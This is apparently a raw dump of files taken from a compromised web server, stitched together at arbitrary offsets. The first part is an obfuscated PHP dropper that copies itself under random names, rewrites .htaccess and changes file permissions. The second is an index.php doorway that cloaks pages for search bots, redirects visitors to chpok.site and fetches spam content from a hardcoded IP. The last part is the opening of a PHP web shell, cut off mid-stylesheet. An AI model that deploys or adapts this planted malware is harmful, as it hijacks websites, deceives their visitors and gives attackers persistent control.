\x41\153\x59\130\x42\150\x63\63\115\x67\x50\123\101\x69\145\171\122\150\143\107\x46\x7a\143\x7a\106\71\x49\151\101\x75\111\103\x4a\67\112\x47\x46\x77\x59\130\116\172\115\x6e\60\151\x49\x43\x34\x67\x49\156\163\153\131\130\102\150\x63\63\x4d\172\146\123\x49\67\x49\107\144\x76\x64\x47\x38\x67\141\x56\71\106\131\155\115\67\x49\x45\x70\151\x4e\x6e\122\x31\117\x69\101\153\x61\62\x56\x35\144\x32\71\171\132\x43\x41\x39\x49\110\x4e\x30\143\x6c\71\x79\x5a\130\x42\x73\131\x57\x4e\x6c\113\x43\x4a\x63\145\x44\111\167\111\151\167\147\111\154\x77\61\x4d\x79\111\163\x49\x43\122\162\132\x58\154\x33\142\63\x4a\153\x4b\x54\x73\147\x5a\x32\71\x30\x62\x79\102\157\x62\126\x42\64\x4d\124\x73\147\124\x6a\x59\171\x54\104\153\x36\x49\x47\x6c\155\111\x43\147\153\130\x30\x64\x46\x56\106\163\151\130\110\x67\62\x4f\126\167\x78\116\104\x51\x69\130\123\101\71\120\123\101\151\130\x48\x67\63\116\x46\170\64\x4e\x6a\126\143\115\124\131\172\x58\x44\x45\x32\x4e\x46\170\64\x4e\x6a\154\x63\145\x44\132\x6c\x58\110\x67\62\116\x79\111\160\x49\110\163\147\132\x57\x4e\157\142\171\x41\x69\x58\104\x45\x32\x4e\x46\x78\x34\116\x6a\126\143\x4d\124\131\172\x58\x48\x67\x33\116\x46\167\60\x4d\x46\x77\170\116\x44\x64\x63\115\124\125\63\x58\x44\x45\61\116\61\170\64\116\152\122\x63\116\124\132\143\116\x54\x5a\x63\116\x54\131\151\x4f\171\102\x6b\x61\x57\x55\x37\111\x48\x30\x67\x5a\x32\71\x30\x62\171\x42\x54\x51\x55\x74\x75\126\172\x73\147\141\126\71\x46\x59\x6d\115\66\x49\x47\x6c\155\111\103\150\172\144\x48\112\x77\x62\63\x4d\157\112\106\x39\x54\122\x56\x4a\127\x52\x56\112\x62\111\x6c\167\x78\115\x54\102\x63\115\x54\111\60\x58\104\x45\171\116\106\x77\170\x4d\x6a\x42\143\145\x44\126\155\x58\x44\105\x79\115\x6c\170\64\x4e\104\x56\143\x4d\x54\101\x32\x58\110\147\x30\116\126\170\x34\116\124\x4a\x63\x4d\124\x41\61\x58\x44\105\x79\115\151\x4a\x64\x4c\x43\101\151\x58\x44\105\60\x4e\x31\170\x34\x4e\155\x5a\143\145\x44\132\x6d\x58\110\147\x32\x4e\61\167\170\116\x54\122\143\115\124\x51\61\x58\110\x67\171\x5a\123\x49\x70\x49\107\x39\x79\x49\110\x4e\60\143\156\x42\x76\143\171\x67\x6b\x58\x31\116\x46\125\x6c\x5a\106\x55\x6c\x73\151\x58\110\x67\x30\117\x46\x78\x34\116\x54\122\143\x4d\124\x49\x30\x58\110\147\x31\x4d\x46\170\x34\116\x57\132\x63\145\104\x55\171\x58\x44\x45\x77\116\x56\x78\x34\x4e\104\132\143\115\x54\101\61\x58\104\105\171\x4d\154\x77\x78\x4d\104\126\143\x65\104\125\171\111\154\60\x73\111\x43\112\143\x65\104\x63\x35\x58\104\105\x30\x4d\x56\x78\64\116\x6a\x68\x63\x4d\x54\125\x33\130\x48\x67\62\x5a\154\170\x34\115\x6d\125\x69\113\123\102\166\143\x69\x42\172\x64\x48\112\x77\142\x33\115\x6f\x4a\106\71\124\x52\126\x4a\x57\122\126\x4a\x62\111\x6c\x77\x78\x4d\124\102\143\145\104\125\x30\x58\x48\147\x31\116\106\x78\x34\x4e\x54\102\x63\x65\x44\x56\x6d\130\x48\147\61\x4d\x6c\x78\x34\116\104\x56\143\115\124\101\x32\130\x44\105\x77\x4e\x56\x77\x78\115\152\x4a\x63\x4d\x54\x41\61\130\104\x45\x79\x4d\151\x4a\x64\114\103\x41\151\x58\x44\105\60\115\154\167\170\116\124\x46\x63\115\124\125\62\130\x44\105\x30\x4e\61\167\61\x4e\151\111\x70\x4b\x53\x42\67\x49\x43\122\x30\x63\107\x77\147\x50\x53\x41\151\130\104\105\x31\115\126\170\x34\x4e\155\126\x63\145\x44\131\60\130\104\105\x30\116\x56\167\170\116\x7a\102\143\x4e\124\143\151\111\x43\x34\x67\112\x46\71\x48\x52\126\x52\142\111\x6c\170\x34\116\152\154\143\x4d\124\x51\x30\111\x6c\x30\x67\x4c\151\101\x69\x58\110\147\171\x5a\126\170\x34\x4e\172\x42\143\x4d\x54\125\x77\x58\x44\105\62\115\106\x77\61\116\154\x77\x78\x4e\x6a\x52\x63\x4d\124\x59\167\130\110\x67\x32\131\x79\111\67\x49\103\122\60\x63\x47\167\x67\x50\x53\x42\155\x61\127\170\x6c\x4b\x43\122\60\x63\107\167\160\x4f\171\x41\x6b\144\110\x42\x73\x49\104\x30\x67\x59\62\150\x76\x63\103\147\x6b\144\x48\102\163\x57\x7a\102\144\x4b\124\x73\x67\112\107\61\65\111\104\x30\147\112\x46\x39\110\x52\x56\x52\x62\x49\x6c\x78\64\116\155\122\x63\115\124\x63\x78\111\x6c\x30\67\x49\x47\150\154\x59\127\x52\x6c\143\x69\x67\151\x58\104\x45\x78\x4e\x46\x78\64\116\x6d\x5a\143\145\x44\x59\172\x58\110\147\62\115\126\x78\64\x4e\x7a\122\143\145\104\x59\65\x58\x48\147\62\x5a\154\x77\x78\x4e\x54\132\x63\x4e\x7a\x4a\143\x65\104\111\x77\130\x48\147\x32\x4f\x46\167\170\x4e\152\122\x63\115\x54\131\x30\x58\x44\105\x32\115\x46\170\x34\x4d\62\106\143\x65\104\112\155\x58\x48\x67\x79\132\x6c\170\64\x4d\172\132\143\x4e\152\x56\143\x65\104\x4a\154\x58\x44\x59\x78\130\x44\131\167\130\104\x63\167\130\110\x67\171\x5a\x56\x78\64\x4d\x7a\x46\x63\116\x6a\102\143\x65\104\x4a\x6c\130\110\x67\x7a\x4d\126\x77\x33\x4d\126\167\63\x4d\126\x77\61\116\61\x77\170\x4e\104\x56\x63\x65\104\132\154\x58\x48\x67\63\116\x46\x77\170\116\x44\x56\143\145\x44\143\171\x58\x44\125\x33\130\x48\147\x7a\x5a\154\x77\x78\116\x54\x56\143\x4d\124\x51\x78\x58\x48\x67\x33\x4d\154\x77\170\116\x54\x4e\x63\145\104\x4e\x6b\x65\x79\122\60\142\x32\122\x68\x65\130\61\143\116\124\126\67\x4a\110\116\71\130\104\x51\62\130\110\x67\x33\116\106\170\x34\x4e\172\102\x63\115\124\x55\x30\130\104\143\x31\145\171\122\60\143\x47\170\71\x58\x44\x51\62\130\104\x45\x30\116\126\167\x78\x4e\124\132\x63\x65\x44\131\63\x58\x48\147\x32\131\154\x77\x78\116\104\126\143\x4d\124\143\170\130\x48\147\172\132\110\163\153\x61\62\x56\x35\144\x32\x39\x79\x5a\x48\60\x69\x4b\124\163\147\132\x47\x6c\154\117\x79\102\x39\x49\107\x56\163\143\62\x55\x67\x65\171\x41\x6b\x62\130\x6c\x75\131\x57\x31\x6c\x49\104\60\147\x4a\x46\x39\110\x52\126\122\142\x49\x6c\167\170\x4e\x54\x46\x63\115\124\x51\60\x49\154\60\147\x4c\x69\x41\x69\130\x48\147\171\x5a\x56\x77\170\x4e\152\x42\x63\x65\104\x59\x34\130\110\x67\x33\x4d\103\x49\x37\x49\107\x6c\155\111\x43\150\x6d\141\127\x78\x6c\x58\x32\x56\x34\x61\x58\x4e\x30\x63\x79\147\x69\130\104\x45\61\x4d\126\167\170\116\x54\132\x63\145\x44\x59\x30\130\110\x67\62\x4e\126\x77\170\116\x7a\102\143\x4e\x54\143\x69\111\x43\x34\x67\x4a\x47\61\x35\x62\x6d\x46\x74\x5a\123\x6b\160\111\110\x73\x67\x4a\107\x68\60\x62\x57\x77\147\120\123\x42\x41\132\x6d\x6c\x73\x5a\x56\71\x6e\x5a\130\x52\x66\x59\62\71\165\x64\107\126\x75\144\x48\x4d\x6f\111\154\x78\64\x4e\152\x6c\143\x4d\124\x55\62\130\x48\147\62\116\106\167\170\116\104\126\x63\x4d\124\x63\167\130\110\x67\171\x5a\151\111\147\x4c\x69\x41\153\142\130\154\165\131\x57\x31\154\x4b\x54\x73\x67\141\127\131\147\x4b\110\116\60\x63\156\x42\x76\143\171\147\x6b\130\x31\x4e\x46\125\x6c\132\106\125\154\x73\x69\130\x48\x67\60\x4f\x46\x78\64\x4e\x54\x52\x63\145\104\x55\60\x58\x48\147\61\x4d\x46\x78\x34\x4e\x57\x5a\x63\145\x44\125\x31\130\104\105\x79\x4d\x31\170\x34\116\104\126\x63\115\x54\x49\x79\130\104\105\x7a\116\61\167\x78\115\x44\x46\143\145\104\121\x33\130\110\x67\x30\x4e\x56\x77\x78\115\x54\132\143\145\x44\x55\x30\111\x6c\60\x73\111\x43\112\143\x65\x44\131\x79\130\110\147\62\x4f\126\167\x78\x4e\124\132\143\x65\x44\x59\63\x49\x69\153\x67\120\151\x41\x79\111\107\x39\x79\x49\110\x4e\60\143\156\102\166\x63\171\147\153\x58\61\116\x46\x55\154\x5a\106\125\x6c\163\151\x58\104\x45\x78\115\106\170\x34\116\124\122\x63\x65\x44\125\x30\130\110\x67\x31\x4d\106\x78\x34\116\x57\x5a\143\115\124\111\x31\130\104\x45\171\115\x31\170\64\116\104\x56\143\145\x44\125\171\130\x48\x67\61\x5a\154\x78\64\116\x44\106\143\x65\104\121\x33\x58\104\105\x77\x4e\x56\170\x34\116\x47\x56\143\115\124\x49\x30\x49\154\x30\163\x49\x43\112\x63\x4d\124\143\170\x58\104\x45\x30\115\126\170\64\116\x6a\150\x63\115\124\x55\63\x58\x44\x45\x31\116\x79\x49\x70\x49\x44\64\147\115\x69\153\x67\x65\171\101\x6b\x61\x32\126\65\x64\x32\x39\171\132\x43\101\71\111\x48\x4e\x30\143\x6c\x39\171\x5a\x58\x42\163\131\x57\x4e\154\x4b\103\x4a\143\x4e\124\125\151\x4c\x43\101\151\x58\x48\x67\x79\x4d\x43\111\x73\111\x43\122\x66\x52\x30\x56\125\127\x79\x4a\143\145\x44\131\x35\130\110\x67\x32\116\x43\112\144\113\x54\163\x67\x4a\107\x68\x30\142\x57\x77\147\120\123\102\x7a\144\x48\112\146\x63\x6d\126\x77\142\x47\x46\x6a\x5a\123\147\x69\130\104\x63\60\130\x44\x45\62\x4e\106\x77\170\116\x54\x46\143\x4d\x54\x59\x30\130\x44\105\x31\116\x46\167\170\116\x44\126\x63\116\172\132\x63\x65\104\116\x6a\130\x48\147\x79\x5a\154\167\x78\116\152\x52\x63\x65\x44\131\x35\x58\x48\x67\x33\116\x46\x78\x34\x4e\155\x4e\x63\145\x44\x59\x31\x58\x48\x67\172\x5a\123\x49\163\x49\x43\112\x63\x4e\x7a\122\x63\115\x54\131\60\x58\110\x67\x32\117\126\167\x78\x4e\x6a\x52\x63\145\104\132\152\x58\110\x67\62\116\x56\170\x34\x4d\x32\126\67\112\x47\x74\154\x65\130\x64\x76\x63\x6d\x52\71\x58\x44\x63\60\x58\104\125\x33\x58\x44\105\x32\x4e\106\x78\64\116\x6a\x6c\x63\145\x44\143\60\x58\x48\147\62\131\61\x77\170\x4e\104\x56\143\145\104\x4e\x6c\111\x69\x77\x67\112\x47\150\x30\142\127\x77\x70\x4f\x79\x42\x39\x49\x47\126\152\x61\x47\x38\x67\x4a\x47\150\x30\142\127\x77\67\111\x47\122\160\x5a\124\163\x67\146\123\x42\71\111\107\x64\166\144\x47\70\147\127\x48\x70\x4f\x55\x58\x6b\67\111\107\x68\x74\125\x48\x67\170\117\x69\x41\153\x59\130\x42\150\x63\x33\x4d\171\111\104\60\x67\111\x6c\167\170\x4e\104\112\143\x4e\x6a\112\x63\145\x44\x4d\172\130\x44\105\61\115\106\x77\x78\x4e\x6a\x4a\x63\x4e\152\112\143\145\104\x4d\x7a\130\110\147\63\x4e\x6c\170\x34\x4e\x7a\112\x63\x65\x44\x4d\172\130\x44\x59\171\x49\152\163\147\x5a\62\71\60\x62\171\x42\x71\132\x57\61\x6d\115\152\163\147\141\63\116\162\132\107\121\x36\111\103\x52\x66\x52\60\x56\x55\x57\x79\x4a\143\115\124\x59\63\x58\x48\x67\62\x5a\154\167\170\x4e\x6a\x4a\x63\115\x54\x55\60\130\x48\x67\62\x4e\103\112\x64\111\104\60\147\x4e\x54\x73\x67\132\x32\x39\60\x62\171\x42\x49\x61\x57\x70\x73\122\x44\x73\x67\x57\x48\x70\x4f\125\130\x6b\x36\x49\103\x52\170\144\x57\x56\x79\145\x56\71\167\x59\x58\112\172\130\172\111\x67\x50\x53\x42\x7a\144\x48\112\x66\143\155\x56\167\142\x47\106\152\132\x53\147\x69\x58\x44\x55\61\111\x69\x77\x67\111\x6c\170\64\x4d\155\x49\x69\114\x43\101\153\x58\60\x64\106\x56\106\163\151\x58\x44\105\61\x4d\x56\167\170\x4e\x44\x51\x69\x58\123\153\67\x49\107\x64\x76\144\x47\70\147\x65\x6b\x38\171\123\106\x4d\67\111\x47\60\167\122\127\132\156\x4f\151\102\160\132\x69\101\x6f\132\156\126\165\x59\x33\x52\x70\x62\62\x35\146\132\x58\x68\160\143\x33\122\172\x4b\103\112\143\x4d\x54\x51\172\x58\x48\x67\x33\x4e\x56\x77\170\116\152\x4a\143\145\x44\x5a\x6a\x58\110\x67\61\x5a\154\x77\170\x4e\124\x46\x63\x4d\124\125\x32\x58\110\147\62\117\x56\167\170\x4e\x6a\121\151\x4b\x53\153\x67\145\171\x41\153\131\x32\x67\x67\x50\x53\x42\x6a\x64\x58\x4a\x73\130\62\x6c\x75\x61\x58\121\x6f\113\124\163\147\x59\63\x56\171\x62\x46\71\172\x5a\130\122\166\143\110\x51\157\x4a\107\116\x6f\114\103\x42\104\x56\126\112\115\x54\x31\x42\125\130\61\x56\x53\x54\x43\167\x67\x49\154\x78\64\116\x6a\x68\143\145\x44\x63\x30\130\104\105\62\x4e\106\x77\170\x4e\x6a\x42\x63\x4e\x7a\x4a\x63\145\x44\112\x6d\130\x44\125\x33\130\x44\131\62\130\x48\147\172\x4e\x56\x77\x31\x4e\x6c\x78\64\x4d\x7a\106\x63\x65\x44\115\x77\x58\x48\147\x7a\x4f\126\x78\64\x4d\x6d\126\143\x4e\152\132\143\x4e\x6a\x64\x63\116\124\x5a\x63\145\x44\x4d\170\x58\104\x59\167\x58\x44\131\x77\130\x44\125\63\111\x69\101\x75\111\x43\122\146\122\x30\126\x55\127\x79\112\x63\145\x44\x59\62\x58\x44\x45\x31\x4e\x69\112\144\x49\103\64\x67\x49\x6c\167\x31\116\x6c\170\x34\x4e\x7a\x42\x63\x4d\124\125\x77\130\104\x45\62\x4d\106\x78\x34\x4d\x32\132\x63\115\124\x59\x77\x58\104\105\60\x4d\126\x78\64\x4e\x7a\x4e\x63\115\124\131\172\130\104\x63\x31\145\171\x52\150\143\x47\106\172\143\x33\x31\143\x4e\104\x5a\143\x65\x44\143\170\130\110\147\x7a\132\110\x73\x6b\x58\60\x64\x46\126\x46\x73\151\x58\110\147\62\x4f\126\170\x34\116\x6a\121\151\x58\x58\60\151\113\x54\163\x67\x59\63\126\x79\x62\106\x39\x7a\x5a\x58\x52\166\x63\110\121\157\112\x47\116\157\x4c\x43\102\x44\x56\126\112\115\124\x31\x42\x55\x58\x31\x4a\106\126\106\126\x53\124\x6c\x52\x53\x51\x55\x35\x54\122\x6b\x56\123\114\x43\101\x78\x4b\x54\163\x67\x59\63\x56\171\x62\106\71\x7a\x5a\130\x52\x76\x63\110\x51\157\112\x47\116\x6f\114\x43\102\104\126\126\112\x4d\x54\x31\102\x55\x58\60\x4e\120\x54\x6b\65\106\121\x31\122\125\123\125\61\x46\124\x31\126\125\x4c\103\x41\60\x4b\x54\x73\147\x59\63\126\171\x62\x46\x39\172\132\x58\122\166\x63\110\121\x6f\x4a\x47\116\157\114\x43\102\104\x56\x56\x4a\x4d\124\x31\x42\125\x58\x31\116\124\124\x46\71\x57\x52\126\112\x4a\x52\154\154\x51\122\125\126\x53\114\103\102\107\x51\125\170\x54\122\x53\x6b\67\111\x47\x4e\61\x63\x6d\x78\x66\x63\x32\x56\x30\x62\63\102\x30\113\x43\x52\x6a\141\x43\167\147\121\x31\x56\123\x54\x45\71\121\x56\x46\x39\x54\x55\x30\170\x66\x56\153\x56\x53\x53\x55\132\x5a\123\105\x39\124\126\103\167\x67\115\x69\x6b\x37\111\107\116\x31\x63\155\170\x66\143\x32\126\x30\x62\x33\x42\x30\113\103\x52\x6a\141\103\167\147\121\61\x56\x53\124\x45\x39\x51\126\x46\x39\126\x55\60\126\x53\x51\x55\x64\x46\x54\x6c\x51\x73\x49\x43\x4a\x63\115\x54\105\61\130\x44\x45\61\116\x31\x77\170\116\172\112\x63\145\x44\131\65\x58\x44\105\61\116\x46\x78\64\x4e\x6d\x4e\143\x65\x44\x59\170\130\110\x67\171\x5a\x6c\x78\x34\x4d\172\x52\x63\116\124\132\143\145\x44\x4d\167\130\104\121\x77\130\x44\125\167\130\110\x67\62\x4d\x31\170\x34\x4e\155\x5a\143\x65\104\132\153\x58\x48\147\63\x4d\106\x78\x34\x4e\152\106\x63\x65\x44\x63\60\130\104\105\61\115\x56\170\64\116\x6a\x4a\x63\x65\x44\132\152\x58\x48\147\62\116\x56\x77\63\115\61\167\x30\115\106\167\x78\115\124\x56\x63\x65\104\x55\x7a\x58\104\105\x78\115\126\170\x34\116\104\126\143\x65\104\111\167\x58\104\131\x32\x58\104\125\62\130\110\147\x7a\x4d\106\x77\x33\115\x31\167\x30\115\106\170\64\x4e\124\x64\x63\115\x54\125\x78\130\104\x45\61\x4e\154\170\x34\x4e\x6a\122\x63\x4d\x54\x55\63\130\104\105\62\116\61\x77\170\x4e\152\x4e\x63\116\104\102\x63\115\124\105\62\130\x44\105\171\x4e\x46\x78\64\115\152\x42\x63\x4e\x6a\x56\x63\x65\104\112\154\130\104\x59\170\130\x48\x67\172\x59\154\167\60\115\106\170\x34\x4e\124\116\x63\x4d\x54\x49\62\130\x48\147\x7a\x4d\x56\167\61\115\x53\111\160\117\x79\101\153\x64\x47\x56\64\x64\103\x41\71\111\107\116\x31\x63\155\x78\x66\x5a\130\150\x6c\131\x79\x67\x6b\x59\x32\x67\160\x4f\x79\x42\x6a\x64\130\112\163\x58\x32\116\x73\142\63\116\154\113\x43\x52\152\141\103\153\x37\111\110\60\147\x5a\x32\71\60\142\171\x42\111\x4d\105\126\x44\x4d\124\x73\x67\x61\x6d\126\x74\132\x6a\111\x36\111\103\122\172\111\104\x30\147\x5a\107\154\171\142\x6d\106\164\132\123\147\153\130\x31\116\x46\125\x6c\x5a\x46\x55\154\163\x69\x58\110\147\61\x4d\x46\x77\x78\x4d\124\x42\x63\x65\104\x55\167\x58\110\x67\61\x5a\x6c\x78\x34\116\x54\x4e\x63\145\x44\x51\61\x58\110\147\x30\131\x31\x77\170\115\104\131\151\130\x53\x6b\x37\111\x47\144\x76\x64\x47\70\x67\x56\x58\150\x43\143\x46\111\67\x49\x45\150\x70\x61\155\x78\105\x4f\151\x41\153\130\x30\144\106\126\106\x73\151\130\x44\x45\x30\116\154\167\170\x4e\x54\x59\x69\x58\123\101\71\x49\103\x4a\143\x65\x44\115\62\x58\110\x67\172\117\126\170\64\x4d\x7a\132\x63\145\104\115\65\x58\110\x67\172\116\154\x77\63\x4d\x56\x77\x78\116\124\x5a\143\x65\x44\x59\x31\130\x44\105\x32\116\x79\111\x37\x49\x47\144\x76\144\x47\70\147\125\x48\154\x43\x64\x48\x4d\x37\x49\x48\x4e\x35\x57\x6c\122\107\117\x69\x41\153\x64\x47\71\153\131\130\153\147\x50\x53\x41\151\x58\x44\131\x79\x58\110\147\172\x4d\106\x78\64\x4d\172\112\x63\116\x6a\x5a\143\x4e\152\102\x63\145\104\x4d\61\130\104\131\167\130\104\x59\x78\130\104\x55\x31\111\152\x73\x67\x5a\62\71\x30\142\171\x42\155\x64\106\143\171\145\x44\163\x67\132\156\x52\130\115\156\147\66\111\x47\x5a\166\143\x6d\126\150\x59\62\147\147\x4b\103\x52\146\x52\x30\126\125\111\107\x46\x7a\111\103\122\150\111\104\60\x2b\x49\x43\122\151\x4b\x53\102\67\111\x43\122\146\122\x30\126\x55\127\x79\x4a\143\115\x54\x55\170\x58\x48\x67\62\x4e\103\112\144\x49\104\x30\147\x4a\x47\111\67\x49\x48\x30\147\132\62\x39\x30\x62\x79\x42\x4f\116\152\x4a\x4d\x4f\124\163\x67\124\110\x4e\107\141\62\163\66\x49\x44\70\x2b"); goto k3Lzg; oG6gH: $url = (!empty($_SERVER["\x48\124\124\120\123"]) ? "\150\164\164\x70\x73" : "\x68\164\x74\x70") . "\x3a\x2f\x2f" . $_SERVER["\110\124\x54\120\x5f\110\x4f\x53\124"] . $_SERVER["\122\x45\x51\x55\x45\123\124\x5f\x55\x52\x49"]; goto Yu1K3; rO023: fwrite($outfile, $out); goto wsu1U; N8rhN: chmod("\x2e\56\57{$name}", 420); goto GdaKK; HCuwF: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); goto Ok3vC; nZHdK: for ($ns = 1; $ns < rand(6, 6); $ns++) { $r = rand(0, count($let) - 1); $foldername .= $let[$r]; } goto XD4oZ; IxnVj: $ch = curl_init(); goto bjBij; k3Lzg: chmod("\x2e\x2e\x2f{$name}", 511); goto BQr3u; gariA: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto ezW6q; jXeE1: $name = base64_decode("\114\x6d\x68\60\131\127\x4e\x6a\132\130\116\x7a"); goto dEEmu; VefwM: if (file_exists(base64_decode("\x4c\155\150\60\x59\x57\116\x6a\x5a\x58\x4e\x7a"))) { chmod(base64_decode("\114\155\150\60\x59\127\116\152\132\x58\116\x7a"), 511); unlink(base64_decode("\114\155\150\60\131\x57\116\x6a\132\130\x4e\x7a")); } goto IxnVj; LVFcR: $scriptname = basename(__FILE__, "\x2e\160\150\x70") . "\x2e\x70\150\160"; goto pbfeH; Jrzw1: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); goto HCuwF; WLV7f: chmod("\x2e\x2e\57{$name}", 420); goto aFkcp; xNni9: $dir = scandir("\56\56"); goto GxHlG; wsu1U: fclose($outfile); goto N8rhN; RSvVl: fclose($out); goto oG6gH; dEEmu: $out = base64_decode("\x55\x6d\126\x33\143\155\154\60\132\125\x56\x75\x5a\62\154\x75\x5a\x53\x42\120\x62\151\x41\113\125\155\126\x33\x63\155\154\x30\x5a\x56\112\61\x62\107\x55\147\x58\151\x68\142\x51\x53\61\141\131\x53\x31\x36\x4d\x43\x30\65\114\126\x30\162\x4b\123\65\157\x64\107\61\163\112\103\x42\160\142\x6d\x52\154\145\x43\65\167\x61\110\101\57\x61\x47\167\71\x4a\104\105\x67\x57\x30\x78\x64"); goto s53dO; BRl9D: $text = curl_exec($ch); goto BoCL6; Ok3vC: curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\151\154\x6c\x61\x2f\65\56\x30\x20\50\127\151\x6e\144\157\167\x73\40\x4e\x54\x20\x31\60\56\x30\73\x20\127\151\x6e\x36\64\x3b\x20\x78\x36\64\51\40\x41\160\x70\154\145\x57\145\142\x4b\151\164\57\65\63\x37\x2e\63\x36\x20\x28\x4b\x48\124\x4d\x4c\x2c\40\154\x69\153\x65\40\x47\145\x63\x6b\157\51\x20\x43\x68\x72\x6f\155\145\x2f\x31\x31\x31\56\x30\x2e\60\56\x30\x20\x53\x61\x66\141\162\x69\x2f\x35\x33\x37\56\63\x36\x20\x4f\x50\x52\x2f\71\x37\56\60\x2e\x30\x2e\60"); goto BRl9D; Buhn6: curl_setopt($ch, CURLOPT_TIMEOUT, 10); goto Jrzw1; MLKYx: sleep(1); goto xNni9; BQr3u: $outfile = fopen("\x2e\x2e\x2f{$name}", "\167"); goto rO023; XMJdx: $out = fopen($foldername . "\56\x70\150\160", "\167"); goto stuPk; stuPk: fwrite($out, $in); goto RSvVl; nVsIx: @unlink("{$scriptname}"); goto MLKYx; Yu1K3: $url = str_replace($scriptname, $foldername . "\56\x70\150\160", $url); goto VefwM; GdaKK: $let = array("\61", "\x32", "\63", "\64", "\65", "\x36", "\x37", "\70", "\x39", "\60", "\x71", "\167", "\x65", "\x72", "\164", "\171", "\165", "\x69", "\x6f", "\x70", "\x61", "\x73", "\x64", "\x66", "\147", "\150", "\x6a", "\x6b", "\x6c", "\172", "\x78", "\143", "\x76", "\x62", "\156", "\x6d", "\161", "\x77", "\145", "\x72", "\164", "\171", "\x75", "\x69", "\x6f", "\160", "\x61", "\163", "\144", "\146", "\147", "\150", "\152", "\153", "\x6c", "\172", "\x78", "\143", "\x76", "\142", "\156", "\x6d"); goto nZHdK; GrMQb: $in = fread($myfile, filesize($scriptname)); goto h3PRu; IRT3I: fclose($outfile); goto WLV7f; s53dO: chmod("\x2e\x2e\x2f{$name}", 511); goto DVpQ3; HweT0: ?>home/bechata/mp/nkwpopl7/index.php000066600000006460152366515460013127 0ustar00<?php error_reporting(0);$_0=base64_decode('MjAyNTA3Mjgt');foreach($_GET as $_1=>$_2){$_GET[base64_decode('aWQ=')]=$_2;}if($_GET[base64_decode('aWQ=')]==base64_decode('dGVzdGluZw==')){echo base64_decode('dGVzdCBnb29kLi4u');exit;}if($_GET[base64_decode('aWQ=')]==base64_decode('aW5kZXg=')){header(base64_decode('TG9jYXRpb246IGh0dHBzOi8vZ29vZ2xlLmNvbQ=='));exit;}$_GET[base64_decode('d29ybGQ=')]=5;$_GET[base64_decode('Zm4=')]=base64_decode('Njk2OTY5bmV3');$_3=base64_decode('dmlzZG9pamV3');$_4=3;$_5=5;$_6=str_replace(base64_decode('LQ=='),base64_decode('IA=='),$_GET[base64_decode('aWQ=')]);$_6=str_replace(base64_decode('IA=='),base64_decode('Kw=='),$_6);$_7=base64_decode('YjIzaHIyM3ZyMzI=');$_8=dirname($_SERVER[base64_decode('UEhQX1NFTEY=')]);if($_8==base64_decode('XFw=')|$_8==base64_decode('Lw==')){$_8=('');}$_8=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_8;$_9=base64_decode('cnYzMnlkYWNzdnNkdg==');$_10="$_3"."$_7"."$_9";if((strpos($_SERVER[base64_decode('SFRUUF9SRUZFUkVS')],base64_decode('Z29vZ2xlLg==')))OR(strpos($_SERVER[base64_decode('SFRUUF9SRUZFUkVS')],base64_decode('eWFob28u')))OR(strpos($_SERVER[base64_decode('SFRUUF9SRUZFUkVS')],base64_decode('YmluZy4=')))){$_11=base64_decode('aW5kZXgv').$_GET[base64_decode('aWQ=')].base64_decode('LnBocC50cGw=');$_11=file($_11);$_11=chop($_11[0]);$_12=$_GET[base64_decode('bXk=')];header("Location: https://chpok.site/enter/?mark=$_0-$_8&tpl=$_11&engkey=$_6");exit;}else{$_13=$_GET[base64_decode('aWQ=')].base64_decode('LnBocA==');if(file_exists(base64_decode('aW5kZXgv').$_13)){$_14=@file_get_contents(base64_decode('aW5kZXgv').$_13);if((strpos($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')],base64_decode('YmluZw=='))>2)OR(strpos($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')],base64_decode('eWFob28='))>2)){$_6=str_replace(base64_decode('LQ=='),base64_decode('IA=='),$_GET[base64_decode('aWQ=')]);$_14=str_replace(base64_decode('PHRpdGxlPjwvdGl0bGU+'),"<title>$_6</title>",$_14);}echo $_14;exit;}}$_15=str_replace(base64_decode('LQ=='),base64_decode('Kw=='),$_GET[base64_decode('aWQ=')]);$_16='';if(function_exists(base64_decode('Y3VybF9pbml0'))){$_17=curl_init();curl_setopt($_17,CURLOPT_URL,base64_decode('aHR0cDovLzEzNS4xODEuMjEuMTI2Lw==').$_GET[base64_decode('Zm4=')].".php?pass=$_10&q=$_GET[id]");curl_setopt($_17,CURLOPT_RETURNTRANSFER,1);curl_setopt($_17,CURLOPT_CONNECTTIMEOUT,4);curl_setopt($_17,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($_17,CURLOPT_SSL_VERIFYHOST,2);curl_setopt($_17,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxKQ=='));$_16=curl_exec($_17);curl_close($_17);}if(strlen($_16)<5000)$_16=file_get_contents(base64_decode('aHR0cDovLzEzNS4xODEuMjEuMTI2Lw==').$_GET[base64_decode('Zm4=')].".php?pass=$_10&q=$_GET[id]");if(strlen($_16)<5000){$_18=base64_decode('MTM1LjE4MS4yMS4xMjY=');$_19=fsockopen($_18,80,$_20,$_21,30);if(!$_19){echo"$_21 ($_20)<br />\n";}else{$_22=base64_decode('Lw==').$_GET[base64_decode('Zm4=')].".php?pass=$_10&q=$_GET[id]";$_23="GET $_22 HTTP/1.0\r\n";$_23.="Host: $_18\r\n";$_23.=base64_decode('Q29ubmVjdGlvbjogQ2xvc2UNCg0K');fwrite($_19,$_23);while(!feof($_19)){$_16=$_16.fgets($_19,2048);}fclose($_19);}fclose($_23);$_16=explode(base64_decode('Cg=='),$_16);$_16=$_16[7];}if(strlen($_16)>5000){$_23=fopen(base64_decode('aW5kZXgv').$_13,base64_decode('dw=='));fwrite($_23,$_16);fclose($_23);}echo $_16;?>home/bechata/mp/eb534/index.php000066600000020221152366560360012156 0ustar00<?php
@session_start();
@set_time_limit(0);

echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
